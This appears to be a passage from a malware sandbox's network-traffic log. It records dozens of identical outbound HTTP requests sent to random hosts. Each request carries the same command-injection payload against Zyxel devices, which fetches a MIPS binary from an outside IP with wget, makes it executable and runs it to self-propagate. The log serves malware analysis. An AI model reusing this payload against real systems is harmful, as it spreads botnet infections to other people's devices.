                                                        Feb 2, 2024 06:21:21.163492918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7273192.168.2.144560659.137.244.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163502932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7274192.168.2.143469873.180.49.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163563967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7275192.168.2.1442182157.187.85.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163594961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7276192.168.2.1442408133.174.116.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163618088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7277192.168.2.1446668101.236.72.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163636923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7278192.168.2.1459388207.39.7.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163666010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7279192.168.2.1443542121.53.41.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163714886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7280192.168.2.1447158209.118.197.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163767099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7281192.168.2.1442624132.46.206.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163794994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7282192.168.2.144651478.150.232.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163825989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7283192.168.2.1453418122.215.166.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163883924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7284192.168.2.1460702222.216.172.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163913012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7285192.168.2.1436750133.236.4.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163964033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7286192.168.2.144799438.41.93.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163997889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7287192.168.2.1436138133.123.126.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164020061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7288192.168.2.1445150200.124.229.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164063931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7289192.168.2.1452872169.219.61.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164110899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7290192.168.2.1439108198.148.123.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164153099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7291192.168.2.1437448177.165.238.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164184093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7292192.168.2.143459485.63.99.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164239883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7293192.168.2.1436714105.235.29.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164278984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7294192.168.2.1441402116.13.21.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164309025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7295192.168.2.144542898.187.248.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164364100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7296192.168.2.1459800222.122.179.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164412022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7297192.168.2.1442638142.148.160.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164447069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7298192.168.2.144461684.11.183.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164494038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7299192.168.2.1441190189.236.45.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164531946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7300192.168.2.1441676183.232.126.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164581060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7301192.168.2.144885289.108.251.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164619923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7302192.168.2.143714063.232.173.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164664984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7303192.168.2.1436508183.223.116.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164675951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7304192.168.2.1448706195.96.52.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164719105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7305192.168.2.1456084191.136.206.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164761066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7306192.168.2.14338708.44.146.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164809942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7307192.168.2.145390835.155.99.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164859056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7308192.168.2.1435052209.129.1.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164891958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7309192.168.2.145879663.237.47.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164937973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7310192.168.2.144915863.217.35.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.164988995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7311192.168.2.145145079.89.79.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.165030956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7312192.168.2.1455604137.40.54.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.165057898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7313192.168.2.1434464128.198.227.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.165118933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7314192.168.2.1439682120.189.10.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.165167093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7315192.168.2.1460632209.153.225.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.165198088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7316192.168.2.1443526148.16.228.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.165224075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7317192.168.2.1436500177.36.85.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.165257931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7318192.168.2.1445446109.223.39.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.165302038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7319192.168.2.145003285.38.228.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.165337086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7320192.168.2.145997667.29.229.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.165371895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7321192.168.2.1437528108.87.2.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.165425062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7322192.168.2.144788037.81.155.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.165466070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7323192.168.2.1444546146.95.132.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.165518999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7324192.168.2.1433692126.108.235.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.169287920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7325192.168.2.145058840.116.232.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.169327974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7326192.168.2.1444042159.245.224.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.169364929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7327192.168.2.1442484113.217.42.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.169409990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7328192.168.2.1449202129.118.69.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.169440985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7329192.168.2.1453246128.233.145.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.169467926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7330192.168.2.144836048.78.55.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.169508934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7331192.168.2.144000671.0.45.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.169548035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7332192.168.2.1436404181.6.114.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.169605017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7333192.168.2.144814071.78.58.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.169641018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7334192.168.2.1435478212.65.254.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.169675112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7335192.168.2.144555094.49.103.192443
                                                        TimestampBytes transferredDirectionData
